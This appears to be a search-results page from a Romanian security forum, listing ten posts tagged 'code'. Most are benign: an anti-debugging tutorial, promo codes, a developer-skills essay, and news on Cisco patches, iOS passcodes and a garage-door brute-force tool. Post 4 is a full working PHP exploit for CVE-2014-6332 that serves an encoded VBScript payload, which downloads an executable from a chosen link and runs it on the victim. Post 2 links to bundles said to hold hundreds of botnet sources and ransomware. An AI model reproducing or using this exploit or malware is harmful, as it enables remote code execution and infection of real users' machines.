Jump to content

Search the Community

Showing results for tags 'code'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

  1. Another day of college, another day of hell—I mean, a beautiful day to write a blog! Now, I may not know much about the ’90s, but for sure, nowadays people use mechanisms to defend their software against reverse engineering. However, that doesn’t mean they’re safe. Don’t take me wrong, but if you have a house made out of sticks, it will break easily. Therefore, there are higher and more complex mechanisms to defend themselves from the same branch. Yeah, I’m talking about anti-debugging, even though real-time debugging is so helpful. Signed by Cringe Blogger (i mean me ) Would you liek to tkae a look here? (#full blog post) Blog What is Anti-Debugging? So let’s stop the chitchat and get to the main point: what is this thing called anti-debugging? The name speaks for itself — anti + debugging, meaning “no debugging.” To achieve this, we use various anti-debugging techniques. This term refers to methods a program can use to detect if it is running under the control of a debugger (e.g., attach + exe [x32dbg]). What is Debugging? Stop asking too many questions! Debugging software lets you run the program step by step, checking each instruction as it goes. This helps you see how the program uses the stack, heap, and registers, and how memory and settings change during runtime. You can follow function calls, track data flow, and find potential weaknesses or hidden features in the program. In short, debugging gives you a peek into the program's inner workings, helping you understand its logic, find flaws, or reverse-engineer its functionality. In the end, anti-debugging is meant to ensure that a program isn’t running under a debugger. But still, it's better to have a house made of stones than one made of sticks. It holds the damage better. Debug flags Let's not rush directly to the implementation or bypass, let's talk about debug flags too (I mean, it's a part of anti-debugging, right?). Now of course we dont have a flag here but something like an indicator used to detect the presence of a debugger. It's a special type of flag that is used to signal whether a program is being "analyzed" by a debugger. #debuger-present .(How? Usually by checking specific memory location, registers, or certain conditions in the system.) Most of the time that flag / indicator or binary indicator is set to 0 or 1. These flags can be set in the process environment block (PEB) or in the thread environment block (TEB). If you're wondering: the PEB is a structure that contains information about the process, such as the process ID, the base address of the process, and the path of the executable. The TEB is a structure that contains information about the thread, such as the thread ID, the stack base, and the stack limit. `NtGLobalFlag` : The NtGlobalFlag is a system-wide flag stored in the PEB (Process Environment Block) structure. It is used to indicate whether a process is being debugged or not. The value of it is 0 by default, but it can be changed to some degree under process control. Environment and System-Level Checks Before we dive into the code, let's talk about some environment and system-level checks that can be used to detect a debugger. Debugger-Specific Environment Variables Some debuggers set environment variables to indicate that a debugger is attached. The program can query the system for the presence of these variables to determine if a debugger is attached. Checking for Debugger Processes Another way to detect a debugger is by checking for the presence of debugger processes. This can be done by enumerating the running processes and checking for the presence of known debuggers, such as OllyDbg, x64dbg, or IDA Pro. Enumerate processes using `CreateToolhelp32Snapshot` and check for known debugger process names. Detecting Debugger-Specific System Calls Some debuggers use specific system calls or insert their own hooks. By checking or analyzing the behavior of these system calls, we can detect the presence of a debugger. Functions that may help: NtQueryInformationProcess System Calls: NtCreateThread NtReadVirtualMemory NtWriteVirtualMemory Detection Techniques: IsDebuggerPresent One of the easiest ways to detect a debugger is by using the `IsDebuggerPresent` function. This function checks whether the calling process is being debugged by a user-mode debugger. If the function returns a non-zero value, the process is being debugged. Otherwise, the process is not being debugged. if (IsDebuggerPresent()) return -1; At a lower level, specifically in assembly language, the code would appear as follows: call IsDebuggerPresent test eax, eax jne debugger_detected debugger_detected: mov eax, -1 ret What’s happening here? The code is calling `kernel32!IsDebuggerPresent`, which generally checks the `BeingDebugged` flag in the PEB (Process Environment Block). If the flag is set, it jumps to the `debugger_detected` label, sets `eax` to `-1`, and returns. Otherwise, it continues execution." CheckRemoteDebuggerPresent Another way to detect a debugger is by using `CheckRemoteDebuggerPresent()`, which checks whether a process is being debugged by a remote debugger. This function takes a process handle as input and returns a non-zero value if the process is being debugged. Otherwise, it returns zero. BOOL ProcessIsBeingDebugged; if(CheckRemoteDebuggerPresent(GetCurrentProcess(), &ProcessIsBeingDebugged)) { if(ProcessIsBeingDebugged) { return -1; } } At a lower level, the code would look like this: lea eax, [ProcessIsBeingDebugged] push eax push -1; ;GetCurrentProcess() ;or mov edi, esp call CheckRemoteDebuggerPresent cmp [ProcessIsBeingDebugged], 1 jz debugger_detected debugger_detected: push -1 call ExitProcess What about x86-64?? lea rdx, [ProcessIsBeingDebugged] mov rcx, -1 call CheckRemoteDebuggerPresent cmp [ProcessIsBeingDebugged], 1 jz debugger_detected debugger_detected: mov eax, -1 call ExitProcess What can we observe here? The code is invoking `kernel32!CheckRemoteDebuggerPresent`, a function that determines if the process is being debugged by a remote debugger. This function is also part of Windows API (the same as `IsDebuggerPresent`). If the process is being debugged, it triggers the `debugger_detected` label, sets `eax` to `-1`, and exits the process. Most of the time the logic behind these functions is the same, but the implementation may differ by that i mean the logic of the code. PEB!BeingDebugged Flag We talked about IsDebuggerPresent and CheckRemoteDebuggerPresent, but what about the PEB (Process Environment Block)? The PEB is a structure that contains information about the process, such as the process ID, the base address of the process, and the path of the executable. The PEB also contains a flag called `BeingDebugged` that indicates whether the process is being debugged. If the flag is set, the process is being debugged. Otherwise, the process is not being debugged. By using this method we dont need to call any function. We can directly check the flag in the PEB. #ifdef _WIN64 PEB pPEB = (PPEB)__readgsqword(0x30); #else PPEB pPEB = (PPEB)__readfsdword(0x60); #endif if (pPEB->BeingDebugged) { return -1; } 32-bit: mov eax, fs:[30h] cmp bye ptr [eax+2], 0 jne debugger_detected 64-bit: mov rax, gs:[60h] cmp byte ptr [rax+2], 0 jne debugger_detected In both cases, the PEB address is fetched from the FS or GSsegment, depending on the architecture: For 32-bit, the PEB address is stored at offset `0x30` in the FS segment. For 64-bit, the PEB address is stored at offset `0x60` in the GS segment. FS is used to store the base address of the Process Environment Block (PEB) in 32-bit Windows. GS is used to store the base address of the PEB in 64-bit Windows. The BeingDebugged flag is located at offset `0x2` in the PEB. If this flag is set (non-zero), it indicates that the process is being debugged. If the flag is not set (zero), the process is not being debugged. Bypassing Anti-Debugging Techniques We took a look at some of the most common anti-debugging techniques, but how can we bypass them? Let's take IsDebuggerPresent as an example. call IsDebuggerPresent test eax, eax jne debugger_detected ... [code] We will analyse the code again and see how can we "bypass" it. The code calls `IsDebuggerPresent` to check if the process is being debugged. It tests the return value of `IsDebuggerPresent` by performing a bitwise AND operation with itself. 3. If the result is non-zero, it jumps to the `debugger_detected` Now , IsDebuggerPresent is one of the easiest anti-debugging techniques to bypass. Why? because we can patch the jump instruction to skip the `debugger_detected` label. call IsDebuggerPresent test eax, eax nop ... [code] Final Thoughts You might be wondering, "What about the other functions?" It's important to recognize that not all anti-debugging mechanisms are implemented in the same way. For instance, while an if statement can often be bypassed by patching the jump instruction, a while statement presents a different challenge. This is why I'm preparing a new blog post focused on bypassing various anti-debugging techniques (though not all of them). The examples I'll be discussing will be drawn from PicoCTF and Crackmes. P.S: I'm not going to post only about bypassing anti-debugging techniques, but also about how to implement them. I’m also looking forward to meeting people with experience in Reverse Engineering. I see myself as an amateur that whishes to learn more and more, day by day.
  2. O mica colectie de boti pentru voi. Bot Bundle 1 - ( includes over 150 bots with source code and moded versions): OSMDB-BOTNET-PACK-1.zip - Speedy Share - upload your files here Bot Bundle 2 - ( 155 bots): OSMDB-BOTNET-PACK-2.zip - Speedy Share - upload your files here Bot Bundle 3 - ( 53 bots and ransomware ): OSMDB-BOTNET-PACK-3.zip - Speedy Share - upload your files here Bot Bundle 4 - ( urxbot, Spybot, sdbot, rxbot, rbot, phatbot, litmus, gtbot, forbot, evilbot, darkirc, agobot, acebot, jbot, microbot, blueeyebot, icebot, q8bot, happybot,): OSMDB-BOTNET-PACK-4.zip - Speedy Share - upload your files here
  3. Testat de mine MERGE! ONLY Linux Apply to 1 GB RAM Only https://t.co/oa8NpuZ7Ja Promotion Code: FWC84Q18KB Sursa:http://thebot.net/threads/free-1-month-vps-1gb-ram.320481/
  4. #!/usr/bin/php <?php # Title : Havij OLE Automation Array Remote Code Execution # Affected Versions: All Version # Founder : ITSecTeam # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham # # # OleAut32.dll Exploit MS14-064 CVE2014-6332 # # # 1 . run php code : php havij.php # 2 . open "Havij" and Enter your exploit link http://ipaddress:80/ # 3 . go to "Setting" and Click "Load Cookie" # 4 . Your Link Download/Execute on your target # 5 . Finished #Youtube : https://www.youtube.com/watch?v=svU8SuJhaVY $port=80; # Port Address $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); socket_bind($reza, 0,$port); socket_listen($reza); print " Mohammad Reza Espargham\n www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n"; $msg = 'PGh0bWw+CjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RW11 bGF0ZUlFOCIgPgo8aGVhZD4KPC9oZWFkPgo8Ym9keT4KIAo8U0NSSVBUIExBTkdVQUdFPSJWQlNj cmlwdCI+CgpmdW5jdGlvbiBydW5tdW1hYSgpIApPbiBFcnJvciBSZXN1bWUgTmV4dApzZXQgc2hl bGw9Y3JlYXRlb2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpCmNvbW1hbmQ9Ikludm9rZS1FeHBy ZXNzaW9uICQoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdG SUxFX0RPV05MT0FEJywnbG9hZC5leGUnKTskKE5ldy1PYmplY3QgLWNvbSBTaGVsbC5BcHBsaWNh dGlvbikuU2hlbGxFeGVjdXRlKCdsb2FkLmV4ZScpOyIKc2hlbGwuU2hlbGxFeGVjdXRlICJwb3dl cnNoZWxsLmV4ZSIsICItQ29tbWFuZCAiICYgY29tbWFuZCwgIiIsICJydW5hcyIsIDAKZW5kIGZ1 bmN0aW9uCjwvc2NyaXB0PgogCjxTQ1JJUFQgTEFOR1VBR0U9IlZCU2NyaXB0Ij4KICAKZGltICAg YWEoKQpkaW0gICBhYigpCmRpbSAgIGEwCmRpbSAgIGExCmRpbSAgIGEyCmRpbSAgIGEzCmRpbSAg IHdpbjl4CmRpbSAgIGludFZlcnNpb24KZGltICAgcm5kYQpkaW0gICBmdW5jbGFzcwpkaW0gICBt eWFycmF5CiAKQmVnaW4oKQogCmZ1bmN0aW9uIEJlZ2luKCkKICBPbiBFcnJvciBSZXN1bWUgTmV4 dAogIGluZm89TmF2aWdhdG9yLlVzZXJBZ2VudAogCiAgaWYoaW5zdHIoaW5mbywiV2luNjQiKT4w KSAgIHRoZW4KICAgICBleGl0ICAgZnVuY3Rpb24KICBlbmQgaWYKIAogIGlmIChpbnN0cihpbmZv LCJNU0lFIik+MCkgICB0aGVuIAogICAgICAgICAgICAgaW50VmVyc2lvbiA9IENJbnQoTWlkKGlu Zm8sIEluU3RyKGluZm8sICJNU0lFIikgKyA1LCAyKSkgICAKICBlbHNlCiAgICAgZXhpdCAgIGZ1 bmN0aW9uICAKICAgICAgICAgICAgICAKICBlbmQgaWYKIAogIHdpbjl4PTAKIAogIEJlZ2luSW5p dCgpCiAgSWYgQ3JlYXRlKCk9VHJ1ZSBUaGVuCiAgICAgbXlhcnJheT0gICAgICAgIGNocncoMDEp JmNocncoMjE3NikmY2hydygwMSkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkm Y2hydygwMCkKICAgICBteWFycmF5PW15YXJyYXkmY2hydygwMCkmY2hydygzMjc2NykmY2hydygw MCkmY2hydygwKQogCiAgICAgaWYoaW50VmVyc2lvbjw0KSB0aGVuCiAgICAgICAgIGRvY3VtZW50 LndyaXRlKCI8YnI+IElFIikKICAgICAgICAgZG9jdW1lbnQud3JpdGUoaW50VmVyc2lvbikKICAg ICAgICAgcnVuc2hlbGxjb2RlKCkgICAgICAgICAgICAgICAgICAgIAogICAgIGVsc2UgIAogICAg ICAgICAgc2V0bm90c2FmZW1vZGUoKQogICAgIGVuZCBpZgogIGVuZCBpZgplbmQgZnVuY3Rpb24K IApmdW5jdGlvbiBCZWdpbkluaXQoKQogICBSYW5kb21pemUoKQogICByZWRpbSBhYSg1KQogICBy ZWRpbSBhYig1KQogICBhMD0xMysxNypybmQoNikKICAgYTM9NyszKnJuZCg1KQplbmQgZnVuY3Rp b24KIApmdW5jdGlvbiBDcmVhdGUoKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgZGltIGkKICBD cmVhdGU9RmFsc2UKICBGb3IgaSA9IDAgVG8gNDAwCiAgICBJZiBPdmVyKCk9VHJ1ZSBUaGVuCiAg ICAgICBDcmVhdGU9VHJ1ZQogICAgICAgRXhpdCBGb3IKICAgIEVuZCBJZiAKICBOZXh0CmVuZCBm dW5jdGlvbgogCnN1YiB0ZXN0YWEoKQplbmQgc3ViCiAKZnVuY3Rpb24gbXlkYXRhKCkKICAgIE9u IEVycm9yIFJlc3VtZSBOZXh0CiAgICAgaT10ZXN0YWEKICAgICBpPW51bGwKICAgICByZWRpbSAg UHJlc2VydmUgYWEoYTIpICAKICAgCiAgICAgYWIoMCk9MAogICAgIGFhKGExKT1pCiAgICAgYWIo MCk9Ni4zNjU5ODczNzQzNzgwMUUtMzE0CiAKICAgICBhYShhMSsyKT1teWFycmF5CiAgICAgYWIo Mik9MS43NDA4ODUzNDczMTMyNEUtMzEwICAKICAgICBteWRhdGE9YWEoYTEpCiAgICAgcmVkaW0g IFByZXNlcnZlIGFhKGEwKSAgCmVuZCBmdW5jdGlvbiAKIAogCmZ1bmN0aW9uIHNldG5vdHNhZmVt b2RlKCkKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICBpPW15ZGF0YSgpICAKICAgIGk9cnVt KGkrOCkKICAgIGk9cnVtKGkrMTYpCiAgICBqPXJ1bShpKyZoMTM0KSAgCiAgICBmb3Igaz0wIHRv ICZoNjAgc3RlcCA0CiAgICAgICAgaj1ydW0oaSsmaDEyMCtrKQogICAgICAgIGlmKGo9MTQpIHRo ZW4KICAgICAgICAgICAgICBqPTAgICAgICAgICAgCiAgICAgICAgICAgICAgcmVkaW0gIFByZXNl cnZlIGFhKGEyKSAgICAgICAgICAgICAKICAgICBhYShhMSsyKShpKyZoMTFjK2spPWFiKDQpCiAg ICAgICAgICAgICAgcmVkaW0gIFByZXNlcnZlIGFhKGEwKSAgCiAKICAgICBqPTAgCiAgICAgICAg ICAgICAgaj1ydW0oaSsmaDEyMCtrKSAgIAogICAgICAgICAgCiAgICAgICAgICAgICAgIEV4aXQg Zm9yCiAgICAgICAgICAgZW5kIGlmCiAKICAgIG5leHQgCiAgICBhYigyKT0xLjY5NzU5NjYzMzE2 NzQ3RS0zMTMKICAgIHJ1bm11bWFhKCkgCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIE92ZXIoKQog ICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGRpbSB0eXBlMSx0eXBlMix0eXBlMwogICAgT3Zl cj1GYWxzZQogICAgYTA9YTArYTMKICAgIGExPWEwKzIKICAgIGEyPWEwKyZoODAwMDAwMAogICAK ICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkgCiAgICByZWRpbSAgIGFiKGEwKSAgICAgCiAgIAog ICAgcmVkaW0gIFByZXNlcnZlIGFhKGEyKQogICAKICAgIHR5cGUxPTEKICAgIGFiKDApPTEuMTIz NDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwCiAgICBhYShhMCk9MTAKICAgICAgICAgICAKICAg IElmKElzT2JqZWN0KGFhKGExLTEpKSA9IEZhbHNlKSBUaGVuCiAgICAgICBpZihpbnRWZXJzaW9u PDQpIHRoZW4KICAgICAgICAgICBtZW09Y2ludChhMCsxKSoxNiAgICAgICAgICAgICAKICAgICAg ICAgICBqPXZhcnR5cGUoYWEoYTEtMSkpCiAgICAgICAgICAgaWYoKGo9bWVtKzQpIG9yIChqKjg9 bWVtKzgpKSB0aGVuCiAgICAgICAgICAgICAgaWYodmFydHlwZShhYShhMS0xKSk8PjApICBUaGVu ICAgIAogICAgICAgICAgICAgICAgIElmKElzT2JqZWN0KGFhKGExKSkgPSBGYWxzZSApIFRoZW4g ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICB0eXBlMT1WYXJUeXBlKGFhKGExKSkKICAg ICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAKICAgICAgICAgICAgICBlbmQgaWYK ICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCiAgICAg ICAgICAgICBleGl0ICBmdW5jdGlvbgogCiAgICAgICAgICAgZW5kIGlmIAogICAgICAgIGVsc2UK ICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAgICAg ICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbgogICAgICAgICAgICAgICAgICB0 eXBlMT1WYXJUeXBlKGFhKGExKSkKICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAK ICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIGlmCiAgICBlbmQgaWYKICAgICAgICAgICAg ICAgCiAgICAgCiAgICBJZih0eXBlMT0maDJmNjYpIFRoZW4gICAgICAgICAKICAgICAgICAgIE92 ZXI9VHJ1ZSAgICAgIAogICAgRW5kIElmICAKICAgIElmKHR5cGUxPSZoQjlBRCkgVGhlbgogICAg ICAgICAgT3Zlcj1UcnVlCiAgICAgICAgICB3aW45eD0xCiAgICBFbmQgSWYgIAogCiAgICByZWRp bSAgUHJlc2VydmUgYWEoYTApICAgICAgICAgIAogICAgICAgICAKZW5kIGZ1bmN0aW9uCiAKZnVu Y3Rpb24gcnVtKGFkZCkgCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dAogICAgcmVkaW0gIFByZXNl cnZlIGFhKGEyKSAgCiAgIAogICAgYWIoMCk9MCAgIAogICAgYWEoYTEpPWFkZCs0ICAgICAKICAg IGFiKDApPTEuNjk3NTk2NjMzMTY3NDdFLTMxMyAgICAgICAKICAgIHJ1bT1sZW5iKGFhKGExKSkg IAogICAgCiAgICBhYigwKT0wCiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCmVuZCBmdW5jdGlv bgogCjwvc2NyaXB0PgogCjwvYm9keT4KPC9odG1sPg=='; $msgd=base64_decode($msg); $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd); for ( { if ($client = @socket_accept($reza)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd); print "\n Target Checked Your Link \n"; } else usleep(100000); } ?>
  5. With this, you could... - Start 3 website auctions... or 6 domain auctions! - Try your first upgrade! Coupon Code: FLIPPA60 Act fast! This code expires on June 24th at 23:59PST. To claim your birthday credit, just create a listing or upgrade an existing listing and click "Redeem Promo Code" link in the Checkout. Enter the promo code "FLIPPA60" and then "Redeem", then it will automatically be applied to your Flippa account.
  6. Am dat peste un raspuns destul de elaborat si bine construit / argumentat si m-am gandit sa il shareuiesc pentru ca poate schimba perspectiva multor useri de p-aici. ( asta daca stiu engleza, desigur ) Argh. No. We really need to stop with the current internet-penis-size mentality around algorithm skills. Yes, testing for basic algorithmic knowledge is an excellent interview shit-test to weed out people that have absolutely no business writing code, but other than that has very little to do with the job of being a software developer. You can spend all bloody day churning out bug-free code with perfect linear time complexity at laser-finger speed, but you might still be a totally shitty developer. We are not athletes or musicians that perform on stage - we are engineers. Our job is to build things. More specifically, (1) build the right things, that (2) work as expected, are (3) easily maintainable for a year or two, and (4) built within reasonable time-frames. This is sort of how I spend my time at work: 40% Talking about WHAT to build. Communication about requirements is by far the most complex, important, and time-consuming aspect of software development. This includes negotiating them, measuring success of them, preventing feature creep from entering the backlog, prioritizing work, how to evolve the architecture instead of just welding the feature on top of it, convincing your product owner that you need to deal with technical debt, and another billion things. If you don't get this right, it will fail your project no matter how good you are at the other stuff. 40% Diving through other peoples code. It is absolutely crucial to be able to absorb other peoples code correctly and quickly, so that you'll make changes that fit (1) in the architecture and (2) don't break existing functionality. It's even more important that you are able to GENERATE code that is easy to understand and absorb, or you'll be a sort of "time cancer" for the team that constantly produces more and more code that wastes more and more time for people to read and understand. I don't care if a programmer has 200 in IQ - if she neglects writing unit tests (the best kind of code documentation), he's GOING to be a detriment for the team, not an asset. 15% Hunting down existing bugs and performance bottlenecks. This has very little to do with algorithmic skills, because humans cannot "look" at 500 000 lines of code and see what is wrong. You need the skillset to methodically narrow down your suspects until you've found the offending method, which usually takes a lot of methodical patience. Once you actually find WHERE the bug/bottleneck resides, it's almost always easy to fix and doesn't require algorithmic genius. 4% Writing actual, new functionality. 1% (and I'm being generous here) Thinking about the time complexity of things. In conclusion: When interviewing, by all means, do a little bit of algorithms just to make sure that the candidate can code, but primarily look at if the person has actually gotten shit done, in a team, in the past.
  7. How to get the key First you need to go to the giveaway page Than you enter your email After you enter your email click on send button Than you need to go to your email Find the email that Okayfreedom send to you Get the code and enter it at your okayfreedom software And that’s all you have free 1 year premium https://www.okayfreedom.com/specials/pcadvisor0615/of
  8. Remote code execution for some, denial of service for the rest of us Cisco has issued a string of patches for 16 faults including a fix for a possible remote code execution in its IOS and IOS XE routing software. The patches address a generous dollop of security conditions caused by faulty queued packets. One flaw, rated severity 8.3, allows attackers to gain remote code execution in IOS XE by sending a crafted packet that allows code to run on affected boxes. Attackers could also send crafted packets to trigger denial of service. "A vulnerability in the AppNav component of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload and may allow arbitrary code execution on the affected system," Cisco says in its advisory. "The vulnerability is due to improper processing of crafted TCP packets. An attacker could exploit this vulnerability by sending a crafted TCP packet that needs to be processed by the AppNav component configured on an affected device. An exploit could allow the attacker to cause an affected device to reload or execute arbitrary code in the forwarding engine." Another fix addresses flaws that allow attackers to spoof Autonomic Networking Registration Authority response thanks to lax message validation "A successful exploit could allow an attacker to bootstrap a device into an untrusted autonomic domain, gaining limited command and control of the AN node, causing a denial of service condition and disrupting access to the legitimate autonomic domain," Cisco says . Further vulnerabilities coupled in that advisory lead to denial of service conditions. The Borg also closed off a medium-severity vulnerability (CVE-2015-0769) in the IOS XR carrier software rated 5 can be easily exploited by attackers sending a packet that would thanks to IPv6 extension headers trigger denial of service. It says this occurs because the headers are not typical of normal operation and says there are no work-arounds for the flaw meaning affected systems will require the patch. "A vulnerability in the IP version 6 processing code of Cisco IOS XR Software for Cisco CRS-3 Carrier Routing System could allow an unauthenticated, remote attacker to trigger an ASIC scan of the Network Processor Unit and a reload of the line card processing an IPv6 packet," it says in an advisory. "The vulnerability is due to incorrect processing of an IPv6 packet carrying IPv6 extension headers that are valid but unlikely to be seen during normal operation. "An attacker could exploit this vulnerability by sending such an IPv6 packet to an affected device that is configured to process IPv6 traffic." That exploit can cause a reload of the line card triggering repeated denial of service through transit traffic or data destined for the device. Affected Cisco IOS XR versions include 4.0.1; 40.2; 4.0.3; 4.0.4; 4.1.0; 4.1.1; 4.1.2, and 4.2.0. IOS XR Release 4.2.1 and later are not affected. Source
  9. Apple iOS 9 users will be required to use six-digit passwords instead of four-digit codes when logging in to a device. The tech giant also announced it would be using two-factor authentication for users signing into Apple services from a new device or browser. The updates will apply to all Apple devices enabled with TouchID. With the new authentication process, users will receive a verification code sent to their device after submitting their password. They will then have to enter the code in the new device or browser in order to gain access to apps and services. Apple unveiled the new features on Monday at its 2015 World Wide Developers Conference in San Francisco. The company also introduced new features including: Apple Music, Apple Car Play, Wallet and a public transit option in Apple Maps, available later this year. Source
  10. Americans’ garages, those sacred suburban havens of automobiles and expensive tools, are probably more important to us than many of our online accounts. But some garages are only protected by a code whose security is equivalent to a two-character password. And security researcher Samy Kamkar can crack that laughable safeguard in seconds, with little more than a hacked child’s toy. On Thursday, Kamkar revealed a new tool he’s created called OpenSesame, which he says can open any garage door that uses an insecure “fixed code” system for its wireless communication with a remote. Built from a discontinued Mattel toy called the IM-ME, altered with a cheap antennae and an open source hardware attachment, Kamkar’s less-than-$100 device can try every possible combination for these garage doors and open them in seconds. “It’s a huge joke,” says Kamkar, a serial hacker who works as an independent developer and consultant. “The worst case scenario is that if someone wants to break into your garage, they can use a device you wouldn’t even notice in their pocket, and within seconds the garage door is open.” Before barricading or booby-trapping your garage against OpenSesame intruders, it’s important to note Kamkar’s exploit doesn’t work against just any garage door—only ones that respond to a “fixed code” wirelessly transmitted by a remote instead of a more secure “rolling code” that changes with every button press. And it’s not clear just how many garage doors actually use that fixed code system. Kamkar found that his own garage door, in a newly built Los Angeles condo, was vulnerable to his attack, though he couldn’t identify device’s manufacturer; the receiver in his building was hidden. When he checked the attack against two friends’ garage door openers—both made by a company called Linear owned by the parent company Nortek—it worked both times. Nortek didn’t immediately respond to WIRED’s request for comment. Another major brand of garage door opener, Genie, didn’t respond to to a request for comment either, but says on its website that its devices use rolling codes. A spokesperson for Chamberlain, the owner of the Liftmaster brand and one of the biggest sellers of garage door openers, initially told WIRED the company hasn’t sold fixed code doors since 1992. But when Kamkar dug up a 2007 manual for a Liftmaster device that seemed to use fixed codes, Chamberlain marketing executive Corey Sorice added that the company has supported and serviced older garage door openers until much more recently. “To the extent there are still operators in the market begin serviced by replacement parts, part of the objective is to get to safer and more secure products,” he said in a phone interview, using the industry term “operator” to mean a garage door opener. “We’d love to see people check the safety and security of their operators and move forward.” Kamkar has posted his own video to help people determine if their garage door is vulnerable or not. To attack fixed code garage door openers, criminals have for years used “code grabbers” that capture the code from a user’s garage door button press and replay it later to open the door. But for these vulnerable systems, Kamkar has reduced the time necessary so that it’s become practical try every possible wireless code. That means someone could walk or drive through a neighborhood, going door-to-door and trying the device until one of the vulnerable garages opens. “For code grabbers, you have to sit there and wait for the person to hit the button,” says Kamkar. “For this, [the victim] never even has to be there.” To perform his brute-force attack, Kamkar used a pre-smartphone toy called a Radica IM-ME. That chunky pink handheld device for wireless text messaging, once sold by Mattel, has been adopted by radio hackers because it’s capable of broadcasting and receiving at a broad range of frequencies. Kamkar added his own antenna to the IM-ME and used GoodFET, a tool built by well-known radio hacker Travis Goodspeed, to reprogram the IM-ME with his cracking program. The fixed-code garage door remotes Kamkar tested use at most 12 bit codes—that’s 4,096 possibilities. In modern computer security terms, that’s a trivial level of security: Kamkar calculates that a password with just two characters offers at least 5,184 possibilities. “Imagine if your bank only let you have a two character password,” Kamkar says. Using a straightforward cracking technique, it still would have taken Kamkar’s program 29 minutes to try every possible code. But Kamkar improved his attack by taking out wait periods between code guesses, removing redundant transmissions, and finally using a clever optimization that transmitted overlapped codes, what’s known as a De Bruijn sequence. With all those tweaks, he was able to reduce the attack time from 1,771 seconds to a mere eight seconds. Even so, that eight-second attack only works for a single frequency; Kamkar says he’s found four frequencies different for vulnerable garage doors he’s tested, and OpenSesame can cycle through its brute-force attack on all four frequencies in less than a minute. Kamkar has detailed OpenSesame’s attack on his website, and also published the tool’s code. But he intends it to serve as a warning, not a how-to manual. In fact, he says he’s even disabled the code so that criminals can’t use it, and wouldn’t comment on exactly how he’s crippled his exploit. That’s a rare move for Kamkar, and one that demonstrates how dangerous he believes his garage attack may be. OpenSesame is just the latest in a long string of high-profile hacks from Kamkar, who gained fame in 2007 when he launched a MySpace worm—what came to be known as the Samy worm—that added more than a million friends to his account in an hour. He’s also built a drone designed to seek out and wirelessly hijack other drones, and a 3-D printed robot that can crack Masterlock combination locks in seconds. Anyone with a garage door that still uses a fixed code system should seriously consider upgrading to a more secure rolling code receiver. But Kamkar hints he’s working on another hack that would extend his attack to rolling codes, too, though he’s not yet ready to release any details about it. If that rolling code hack turns out to be effective, there may be no such straightforward answer for garage door security. “It’s a sticky situation. I haven’t even figured out what I’m supposed to do to my own garage,” Kamkar says. “I don’t have a great solution for anyone, including myself.” Source
